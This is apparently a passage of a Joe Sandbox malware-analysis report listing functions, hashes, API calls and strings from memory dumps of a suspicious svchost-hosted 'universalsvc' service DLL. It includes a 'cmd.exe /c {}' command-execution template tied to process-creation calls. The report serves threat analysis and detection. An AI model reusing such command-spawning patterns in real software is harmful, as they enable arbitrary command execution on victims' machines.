            • API String ID: 3215553584-1995029353
            • Opcode ID: dc88254be005a811713ed9997bea8f29745d65432a2c085724142b0a6929da94
            • Instruction ID: 7a7e8f277cb7b743f7c00b484d8adcddc8afd5507cd6a9ef490d10a15b3154d6
            • Opcode Fuzzy Hash: dc88254be005a811713ed9997bea8f29745d65432a2c085724142b0a6929da94
            • Instruction Fuzzy Hash: 5312A061E0D58386FB27BB15E15467A76A2EBC2750FC4C131E68E47AE9DB3CF5808B04
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$m_data.m_type != value_t::array || m_data.m_value.array != nullptr$m_data.m_type != value_t::binary || m_data.m_value.binary != nullptr$m_data.m_type != value_t::object || m_data.m_value.object != nullptr$m_data.m_type != value_t::string || m_data.m_value.string != nullptr
            • API String ID: 3668304517-4140447594
            • Opcode ID: 07e32b68dd295c9948062d56699bd56e0e0a6a0ff4e8793ced9d88c809dde9ef
            • Instruction ID: c965cfb8baba9f82358cc7c6d22080a8d4ed2173f2c0a2d606a621763ffb2d99
            • Opcode Fuzzy Hash: 07e32b68dd295c9948062d56699bd56e0e0a6a0ff4e8793ced9d88c809dde9ef
            • Instruction Fuzzy Hash: 1A718F62A1CA8691EB13EB21D4503BA27A0FB56B88F58C131DA8D076A7DF7CE584C744
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: other_error
            • API String ID: 1944019136-896093151
            • Opcode ID: 46c2e466bfcbd234a49d75eccae352d2e72506dc183e43a35bea45db466a189e
            • Instruction ID: 682caa9c8c5a2e19245a24e4ef5ab25386ef20253e3990b6b01b3a054f2e084d
            • Opcode Fuzzy Hash: 46c2e466bfcbd234a49d75eccae352d2e72506dc183e43a35bea45db466a189e
            • Instruction Fuzzy Hash: 9851A362F1DB8594EB02EF75D4803AD2361EF56798F50D331EA2C12AE6EF68E190C344
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: out_of_range
            • API String ID: 1944019136-3053435996
            • Opcode ID: 2f6af5d0ec7809bf5e594dbb3042df54aef139d4b5368122e7d9f98310518c8c
            • Instruction ID: 52908dec9f5572886d4ff0564d43992178f16feacbe654ce70f2ac040cc5fef9
            • Opcode Fuzzy Hash: 2f6af5d0ec7809bf5e594dbb3042df54aef139d4b5368122e7d9f98310518c8c
            • Instruction Fuzzy Hash: 1A51B362F1DB8594EB02EF75D4903AD2361EB56398F50D331EA2C13AE6EF68E190C344
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: type_error
            • API String ID: 1944019136-1406221190
            • Opcode ID: 60f9d702eb8e27b0e1236a347d63c92d24e049e302713a039c9c627d3543b1bf
            • Instruction ID: c195d220f83b23da73f95e11d06424a8e6192debdab5a9556ff69ed3e6a85301
            • Opcode Fuzzy Hash: 60f9d702eb8e27b0e1236a347d63c92d24e049e302713a039c9c627d3543b1bf
            • Instruction Fuzzy Hash: 5B51C362F5CB4195EB02EB75D4803AD2331EF563A8F509331EA2D12AE6EF68E195C344
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: Sleep_amsg_exit
            • String ID: *h
            • API String ID: 1015461914-2503545728
            • Opcode ID: d71459b7e88d01f4bf183fdd78d36db14fdc43101005de96b340a8d435ed0a17
            • Instruction ID: bc10db7b8ab239d922cef09c0acd2a62a0b9178dccc3a2cd58c18541aecdeb8b
            • Opcode Fuzzy Hash: d71459b7e88d01f4bf183fdd78d36db14fdc43101005de96b340a8d435ed0a17
            • Instruction Fuzzy Hash: A941BF7271166AC5EF058B1BE96075922A2B744F99F888526CE3C873D4EF79C8D5C300
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
            • String ID: at line $, column
            • API String ID: 729085983-191570568
            • Opcode ID: 3b625d8fae75a84ccd4ccd8625523e9856e43c18d8bdc2832f3306b6a8bdd0bf
            • Instruction ID: df64c524e5536f1b834ef53c18e85a7a646cbeaf14a7155c9d11b05a0ec062b1
            • Opcode Fuzzy Hash: 3b625d8fae75a84ccd4ccd8625523e9856e43c18d8bdc2832f3306b6a8bdd0bf
            • Instruction Fuzzy Hash: 5551C462A0C74581EB12AB15E18037E6761EB86BD4F508131EA5D07BEBDF7CE491C748
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: {for
            • API String ID: 2943138195-864106941
            • Opcode ID: 01ab92cd314f3a3e33d37c51ddd0482448ebee4470facb04c4aea7c8b7d7bd22
            • Instruction ID: 5927ee9e55a9aa716b387d1d019dbbaa3148e401d2efce22cb8beb9feb93a406
            • Opcode Fuzzy Hash: 01ab92cd314f3a3e33d37c51ddd0482448ebee4470facb04c4aea7c8b7d7bd22
            • Instruction Fuzzy Hash: 5F511976A0CA86A9E703AF25D4803E877A0EB4674CF40C432EA4D57BAADF7CE555C710
            APIs
              • Part of subcall function 00007FFA41850AF0: GetCurrentThreadId.KERNEL32 ref: 00007FFA41850B41
              • Part of subcall function 00007FFA41850AF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850B60
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA417EAD03
            • std::_Throw_Cpp_error.LIBCPMT ref: 00007FFA417EAD0E
            • std::_Throw_Cpp_error.LIBCPMT ref: 00007FFA417EAD23
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA417EAD2F
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Cpp_errorThrow__invalid_parameter_noinfo_noreturnstd::_$AcquireCurrentExclusiveLockThread
            • String ID: [+] $[-]
            • API String ID: 3822504202-3676303169
            • Opcode ID: ef7c4d45ab3a0c29d5cc6bb7da52a2a04dca5d681e3515abc86de6a072b2ff23
            • Instruction ID: fe5b9cd83e0081cb4c91ab0452a488c9ae1e08ab457d98248445de971ed4c59b
            • Opcode Fuzzy Hash: ef7c4d45ab3a0c29d5cc6bb7da52a2a04dca5d681e3515abc86de6a072b2ff23
            • Instruction Fuzzy Hash: 1051B472A0C74681EB53BB25E44077A73A1EB827A4F508731E66C426FADF7CE484CB44
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
            • API String ID: 909987262-2189586557
            • Opcode ID: c42ba10caa87dec15c2a1dc717eeddd85dbbd19922bf1dfca907701a47dc17b1
            • Instruction ID: cb3523d8c50db825d7af5d7a6b975f2ee5584722a265f4461ffe6ed4b44b8f3d
            • Opcode Fuzzy Hash: c42ba10caa87dec15c2a1dc717eeddd85dbbd19922bf1dfca907701a47dc17b1
            • Instruction Fuzzy Hash: E441FC12F0C69A86EB23B749E4040BD6371DB92BC4F58D432DA8D177B6DE6CE6418B05
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name$false
            • API String ID: 2967684691-2236580902
            • Opcode ID: af4ba545310d87b0416df412bc63d27242d58c22569339931ea64804b945de5c
            • Instruction ID: b33a55193d6ef30e0b7b2eda5c298943fb850909550cab5e56c83ab59d61ebea
            • Opcode Fuzzy Hash: af4ba545310d87b0416df412bc63d27242d58c22569339931ea64804b945de5c
            • Instruction Fuzzy Hash: 39417C22B0DB41CAFB23EFB0D4502BD23B4AF45748F548438DE4D26AA6EF38E5169744
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: isalphamalloc$isalnum
            • String ID: iso
            • API String ID: 2831391162-1633189697
            • Opcode ID: 379039d3c6cd4022b394262d792753cea32b5fb76a50e5e8bc0dc4f44bcb7480
            • Instruction ID: 4d61cd036929f077c3b3353bd730b2f175edf52a7f4f44be370ff802bb0db5f3
            • Opcode Fuzzy Hash: 379039d3c6cd4022b394262d792753cea32b5fb76a50e5e8bc0dc4f44bcb7480
            • Instruction Fuzzy Hash: 3C316DE270969986EE05DF26A81836A7B91FB447D4F888425EE6D43390EF39C04EC300
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: CloseHandle$CreateObjectProcessSingleWait_invalid_parameter_noinfo_noreturn
            • String ID: cmd.exe /c {}
            • API String ID: 3882512363-3162138867
            • Opcode ID: e6e73508bac80ffb6bc673906e498a8d019b8ec9f6624faa178bb13faa37020d
            • Instruction ID: 969367d101f4c6b6cc3dc91c3651f1b5bc42ede417df6b99b30cd8f25a709f68
            • Opcode Fuzzy Hash: e6e73508bac80ffb6bc673906e498a8d019b8ec9f6624faa178bb13faa37020d
            • Instruction Fuzzy Hash: CE515332E1CB818AE711DF64E8403AD73B1F799758F109225EA8C56A69EF78E194C700
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+Replicator::operator[]
            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
            • API String ID: 1405650943-2211150622
            • Opcode ID: abdf3c9d47fd777483e5986572490f175ff6de82a80ae3827d73ded38ea1d109
            • Instruction ID: af7612be24c3871c85585ea54b76b79118129ca49171879630f2cb2be96cb0b7
            • Opcode Fuzzy Hash: abdf3c9d47fd777483e5986572490f175ff6de82a80ae3827d73ded38ea1d109
            • Instruction Fuzzy Hash: 4C41F26AE0CB4698F713AF28D8802B837B4FB0670CF548532CA4D667A5DF7CA545C711
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: char $int $long $short $unsigned
            • API String ID: 2943138195-3894466517
            • Opcode ID: 95ccef905f3e3d65094cd85f74d5c660e404a7f864b719e0b38266dc58e888a9
            • Instruction ID: 8799a2e414405ed204b0a4c3e9568368fbd02ff93ae6d6397c5bae7dd9744f39
            • Opcode Fuzzy Hash: 95ccef905f3e3d65094cd85f74d5c660e404a7f864b719e0b38266dc58e888a9
            • Instruction Fuzzy Hash: D4318A36A0CB42CEE707AF68D8901B837B1FB86748F58C131DA0D16BA8CE3CA504C714
            APIs
            Strings
            • C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp, xrefs: 00007FFA4186D37B
            • m_data.m_type != value_t::binary || m_data.m_value.binary != nullptr, xrefs: 00007FFA4186D37A
            • Assertion failed: %Ts, file %Ts, line %d, xrefs: 00007FFA4186D3C8
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ConsoleFileHandleTypeWrite
            • String ID: Assertion failed: %Ts, file %Ts, line %d$C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$m_data.m_type != value_t::binary || m_data.m_value.binary != nullptr
            • API String ID: 3929808755-1148463386
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
            • String ID: CONOUT$
            • API String ID: 3230265001-3130406586
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ByteCharMultiWide$CompareInfoString
            • String ID:
            • API String ID: 2984826149-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ByteCharMultiStringWide
            • String ID:
            • API String ID: 2829165498-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+$NameName::
            • String ID:
            • API String ID: 168861036-0
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 00007FFA41850B41
            • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850B60
            • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850B82
            • sys_get_time.LIBCPMT ref: 00007FFA41850B9D
            • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850BC3
            • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850BDB
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
            • String ID:
            • API String ID: 184115430-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
